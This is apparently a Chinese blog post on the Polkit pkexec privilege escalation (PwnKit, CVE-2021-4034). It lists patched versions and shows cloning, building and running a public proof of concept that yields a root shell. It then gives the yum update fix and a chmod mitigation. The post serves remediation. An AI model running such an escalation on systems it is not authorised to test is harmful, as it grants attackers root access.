LinuxPolkit本地权限提升漏洞（CVE4034）修复方法

　　近日，Qualys研究团队公开披露了在Polkit的pkexec 中发现的一个权限提升漏洞，也被称为PwnKit。该漏洞是由于pkexec 无法正确处理调用参数，从而将环境变量作为命令执行，任何非特权本地用户可通过此漏洞获取root权限。目前该漏洞PoC已公开。
　　具有任意用户权限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞，从而获得受影响主机的root 权限。
　　Polkit预装在CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等多个Linux发行版上，所有存在Polkit的Linux系统均受影响。
　　以下为安全版本CentOS系列： CentOS 6：polkit-0.96-11.el6_10.2 CentOS 7：polkit-0.112-26.el7_9.1 CentOS 8.0：polkit-0.115-13.el8_5.1 CentOS 8.2：polkit-0.115-11.el8_2.2 CentOS 8.4：polkit-0.115-11.el8_4.2  Ubuntu系列： Ubuntu 20.04 LTS：policykit-1 - 0.105-26ubuntu1.2 Ubuntu 18.04 LTS：policykit-1 - 0.105-20ubuntu0.18.04.6 Ubuntu 16.04 ESM：policykit-1 - 0.105-14.1ubuntu0.5+esm1 Ubuntu 14.04 ESM：policykit-1 - 0.105-4ubuntu3.14.04.6+esm1查看系统是否存在CVE-2021-4034漏洞# rpm -qa polkit polkit-0.115-11.el8.x86_64
　　注意：版本号必须完全一致，否则还是存在漏洞。最好的办法是通过代码验证，验证代码库地址：https://github.com/berdav/CVE-2021-4034通过代码进行漏洞验证git clone https://github.com/berdav/CVE-2021-4034.git Cloning into ＂CVE-2021-4034＂... remote: Enumerating objects: 64, done. remote: Counting objects: 100% (64/64), done. remote: Compressing objects: 100% (40/40), done. remote: Total 64 (delta 28), reused 52 (delta 22), pack-reused 0 Unpacking objects: 100% (64/64), 15.13 KiB | 860.00 KiB/s, done.
　　切换到源代码目录，编译，运行，输入命令whami可以看到当前用户已经变成了root。
　　事实证明确实存在此漏洞！[jupiter@localhost ~]$ cd CVE-2021-4034/ [jupiter@localhost CVE-2021-4034]$ ls cve-2021-4034.c  cve-2021-4034.sh  dry-run  LICENSE  Makefile  pwnkit.c  README.md [jupiter@localhost CVE-2021-4034]$ make cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c cc -Wall    cve-2021-4034.c   -o cve-2021-4034 echo ＂module UTF-8// PWNKIT// pwnkit 1＂ > gconv-modules mkdir -p GCONV_PATH=. cp /usr/bin/true GCONV_PATH=./pwnkit.so:. [jupiter@localhost CVE-2021-4034]$ ./cve-2021-4034 sh-4.4# whoami root修复
　　以下命令在Rocky Linux 8.5上验证，可以修复CVE-2021-4034漏洞# yum clean all && yum makecache # yum update polkit -y polkit-0.115-13.el8_5.1.x86_64
　　命令的含义
　　yum clean all：清除所有的缓存信息，包括packages、metadata、headers，这个命令相当于执行了下面三条命令# yum clean packages # yum clean metadata # yum clean headers
　　yum makecache：生成缓存
　　此时再执行验证代码，可以发现已经无法提升权限。$ ./cve-2021-4034 pkexec --version |        --help |        --disable-internal-agent |        [--user username] [PROGRAM] [ARGUMENTS...]  See the pkexec manual page for more details.  Report bugs to: http://lists.freedesktop.org/mailman/listinfo/polkit-devel polkit home page: 
　　注意：在某些CentOS 8版本中，执行 yum update polkit -y 之后，polkit的版本号显示为：polkit-libs-0.115-12.el8.x86_64，经过验证，此版本仍然存在漏洞。此时只能通过下面的临时缓解措施解决。临时缓解措施
　　CentOS 8 操作系统可能确实无法通过 yum update polkit -y 的方法修复漏洞，这是因为CentOS 8已经于2021年12月31日停止更新并停止维护（EOL）。
　　那么只能通过临时缓解措施解决了。chmod 0755 /usr/bin/pkexec
　　缓解之前的# stat /usr/bin/pkexec   File: /usr/bin/pkexec   Size: 29032           Blocks: 64         IO Block: 4096   regular file Device: fd01h/64769d    Inode: 264437      Links: 1 Access: (4755/-rwsr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root) Access: 2022-01-25 15:48:21.000000000 -0500 Modify: 2022-01-25 15:48:21.000000000 -0500 Change: 2022-01-29 23:58:54.717605344 -0500  Birth: -
　　缓解之后的# stat /usr/bin/pkexec   File: /usr/bin/pkexec   Size: 29072           Blocks: 64         IO Block: 4096   regular file Device: fd00h/64768d    Inode: 138432      Links: 1 Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root) Access: 2022-01-30 12:50:04.077915200 +0800 Modify: 2021-06-02 21:05:51.000000000 +0800 Change: 2022-01-30 12:49:48.695915200 +0800  Birth: -
　　变化在于文件/usr/bin/pkexec的权限由之前的4755变成了0755参考https://cloud.tencent.com/developer/article/1939701验证代码：https://github.com/berdav/CVE-2021-4034
　　本次测试环境在阿贝云免费云服务器（https://www.abeiyun.com/）上进行，阿贝云目前正在进行＂免费虚拟主机＂和＂免费云服务器＂体验活动，感兴趣的可以试试。